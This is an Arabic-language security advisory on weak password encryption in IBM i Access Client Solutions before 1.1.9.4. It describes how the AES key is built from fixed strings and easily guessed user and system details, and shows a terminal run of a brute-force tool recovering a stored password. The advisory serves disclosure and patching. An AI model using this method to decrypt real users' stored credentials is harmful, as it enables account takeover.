
IBM i Access Client Solutions < 1.1.9.4 - تشفير كلمة مرور ضعيف
IBM i Access Client Solutions < 1.1.9.4 - تشفير كلمة مرور ضعيف
يستخدم IBM i Access Client Solutions لتخزين كلمات مرور المستخدمين خوارزمية AES، ومع ذلك فإن مفتاح التشفير ذو 16 بايت هو مزيج من سلسلة ثابتة (Thanatos) وأحرف عشوائية من سلسلة تتكون من سلسلة ثابتة أخرى (Behemoth) مُدمجة مع اسم المستخدم، المجلد الرئيسي للمستخدم، نظام التشغيل (مثل Linux) مُدمجة مع الدليل الحالي الذي تم بدء التطبيق منه. ونتيجة لذلك، نصف مفتاح التشفير ثابت (السلسلة Thanatos) بينما النصف الآخر محدود جدًا. مما يسهل جدًا على المهاجم تجربة كلمات المرور بالقوة الغاشمة حتى على نواة معالج واحدة.
فيما يلي مثال لفك تشفير كلمة مرور المستخدم mmajchrowicz باستخدام البرنامج النصي as400_password_bruteforce_tool.java من حساب mkubiak:
┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ java as400_password_bruteforce_tool.java mmajchrowicz_funciton_admin_work.bin Linux mmajchrowicz /opt
IBM AS400 Password Bruteforce Tool v0.3 by Michał Majchrowicz AFINE Team
Full keyspace: mmajchrowiczLinux/opt/home/mmajchrowiczBehemoth
Full keyspace length: 47
Reduced keyspace: BmajchrowizLnux/pte
Reduced keyspace length: 19
Found good pass: Thanatosaun/Lcmo
Encrypted system password 7 bytes:
2E 1B 10 0A 1B 0D 0A
Decrypted system password 7 bytes:
50 65 6E 74 65 73 74
Decrypted system password: Pentest
هذه المشكلة ناتجة عن تطبيق تشفير كلمة مرور ضعيف. تم إصلاح هذه المشكلة في IBM i Access Client Solutions 1.1.9.4.
< 1.1.9.4
قم بتحديث IBM i Access Client Solutions إلى الإصدار 1.1.9.4 أو أحدث.